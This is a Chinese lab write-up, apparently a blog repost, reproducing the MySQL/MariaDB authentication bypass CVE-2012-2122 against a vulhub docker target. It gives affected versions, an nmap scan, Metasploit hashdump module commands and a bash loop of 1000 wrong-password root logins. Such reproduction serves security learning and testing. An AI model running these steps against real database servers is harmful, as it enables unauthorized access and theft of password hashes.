当前位置:   article > 正文

mysql身份认证绕过漏洞复现(CVE-2012-2122)_mysql cve-2012-2122

mysql cve-2012-2122

漏洞描述

当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。

漏洞危害

漏洞泄露了数据库等关键敏感信息,如果被篡改数据库信息其危害较大

受版本影响

  • MySQL 5.1.x before 5.1.63

  • 5.5.x before 5.5.24,

  • 5.6.x before 5.6.6,

  • MariaDB 5.1.x before 5.1.62,

  •    5.2.x before 5.2.12

  •   5.3.x before 5.3.6

  • 5.5.x before 5.5.23

 

主机准备

一台ubuntu(192.168.8.158),一台kail

均处于同一内网环境下。

其中kail作为攻击主机,ubuntu作为受害主机。

 

环境搭建

  • 进入vulhub-master目录环境:

25a0e3978cb0ad6a9c1fd6b8a55564a7.png

 

  • 执行如下命令:


<code class="language-plaintext hljs">docker-compose up -d</code>
09def2237356501b327204a03a9a948e.png

dokcer ps 查看进程是否启动

751dc392b75f622fb66c4644cfd43ee8.png

访问3306端口查看环境

cedb4b53c4c110c4de322c5e07b9f4a3.png

此时环境搭建成功

 

nmap -T4 -sV -O -p 3306 192.168.8.158

进行端口扫描发现靶机开启3306端口,并且mysql版本5.5.23

5c3d58b9f194eb1b457c32ab9ca4543c.png

 

漏洞复现

第一种:

使用Meterpreter

msfconsole

ea8cb04f45c3c9dea592067ab94a8b97.png

search CVE-2012-2122

a9c6b5e6381e63ef047b4608536ac217.png

use auxiliary/scanner/mysql/mysql_authbypass_hashdump

f7b985f28445436638fe07dc29cf87e6.png

show options

4c47fd5d00a7d24ccab71976397c5200.png

set RHOSTS 192.168.8.158

 

set THREADS 20

79fe938b6a9ae16eb050ca8dff948e56.png

run

8a41cab73d4e105482db96178ef3ec3b.png

这里可能是msf有些许问题导致没有爆出root密码

如果有同学和我有相似问题可以参考以下方法

 

第二种:

使用shell脚本

先使用正确的密码登录看看是否成功启动环境

在kail主机的命令行输入命令

mysql -h 192.168.8.208 -u root -p123456 -P3306(如果提示连接次数过多请重启环境)

bfb345765b6b9c100d485e245c91140b.png

 

编写如下shell脚本,并执行

payload.sh

17aadb68ac758c2cba552b689534c31a.png

<code class="language-plaintext hljs">for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.8.208 -P3306 ; done</code>

注:将ip改为自己的

命令行执行

切换到脚本存放路径


<code class="language-plaintext hljs">bash payload.sh</code>
5bc7e4484cd2bd9adc0d87acf42cc6eb.png

此时复现成功

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小惠珠哦/article/detail/987265
推荐阅读
相关标签
  

闽ICP备14008679号